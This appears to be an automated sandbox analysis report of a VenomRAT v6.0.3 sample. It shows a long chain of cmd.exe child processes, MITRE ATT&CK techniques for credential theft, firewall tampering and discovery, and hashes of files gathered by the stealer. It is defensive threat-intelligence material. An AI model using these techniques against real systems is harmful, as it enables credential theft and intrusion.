C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14172
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14212
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17172
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20668
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1056 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\Information\Information.txt2⤵PID:2908
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
1Permission Groups Discovery
1Local Groups
1Process Discovery
1Query Registry
4System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1System Network Connections Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\Desktop.txt
Filesize631B
MD5a93bdb6696278ba96e015427be801ca9
SHA16878366f1f3bb514f3cd9be4c8f98e1064b53204
SHA256e9e4e5581113c45b1f0f88d8e3b68dec58339b2c7bf065ce05ad4c4e6414bc3f
SHA51220ce9ba33aada697ca7309e21ece123b5c1f6a9cfc3c4a7317dd71714e07f4e0d6fe8030f63ef64e3a97135932a251caebdf7cbdc322d39851ca3eda77a820be
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\Documents.txt
Filesize844B
MD50e424f8a5397a14e284f0d4decc2fa6e
SHA1d9440bd0e28e62f10aada32fcc855a337ebdce32
SHA256d88d02439999c61f75d6ac554eb43963cbd4bc6f95522d0e4268eb57c537705e
SHA5121ba3b770b46d17de81913b8494bb81af2052d55f1f969bef98e2f0d758548a910de0cf29cca3df1fc0afb3f1373eb7df32adbe8991bd42b56d6fa5324407aabc
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\OneDrive.txt
Filesize25B
MD5966247eb3ee749e21597d73c4176bd52
SHA11e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA2568ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\Pictures.txt
Filesize734B
MD58d51fa6cb721469bad75d6e99369981f
SHA12cc94628311f9fc9602ae9b3b0d89c25e453c3aa
SHA256f8d0271e32f6fc3b24a141c7ec6af0cda98868e6b0c5cb593380cd8681c53354
SHA512b590ef245d0f8b1dcafbdbcbb3073fc16d8a60753453439796295a6e1289d961e7b7ab55f1a37a56e94f918d27af87180d05c46d37e08f89984e0c9a617c15fd
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\Startup.txt
Filesize24B
MD568c93da4981d591704cea7b71cebfb97
SHA1fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA51263455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Directories\Videos.txt
Filesize23B
MD51fddbf1169b6c75898b86e7e24bc7c1f
SHA1d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA51220bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\VenomStealer\Logs.txt
Filesize1KB
MD5ad0b5289446377bf11fd36334f429ce3
SHA1ef746b3bf28043a231e3735a873602cb3df1a628
SHA2564d324794cbb57d6666f7312622c0366b2fe4c06ee6d8a9d3bbc4943066eed5f5
SHA5120036b8730bb72f8f6f0cfaadb3afe2d03a3819f60ab1d653e6ff6f5b50db8eaba0a9af6c617096fa322352a356154ad31560ed0b384a06a03966a652504098e7
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Algorithm\Aes256.cs
Filesize3KB
MD567017528f9949e89bbf199c8f330f746
SHA1635c7ad0c9470a6467d0bb8a3ae865b9d0677e3b
SHA256308aa10ee89ccd2b6107276bcd054fefb408bf2c62201b32eb4da0db5c340bc5
SHA51265c25386ac35fbf58bf3bd17a20ef33842c4a79783f4800a5fc471feee266d89d8d568bb10acc614c6efdd971ad394b1bb4db85dd1547df054387accf9db2169
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Algorithm\GetHash.cs
Filesize355B
MD5adaa0544a3f06d990507d8fbcc6ef55b
SHA14b706ad787f09005f30b1bff3c071a057349589a
SHA256b1daa323bf8a6569992d9abc956d29ee78ce86e522e1766df375484b7439fb87
SHA512f8620bc6bc4050a30eec387c9f789e8e351638090cf43d2167048f763c6b83470ca56ac0094d12791750243ebcb146033d6300cda885bfa7fa37440fb6099cb9
-
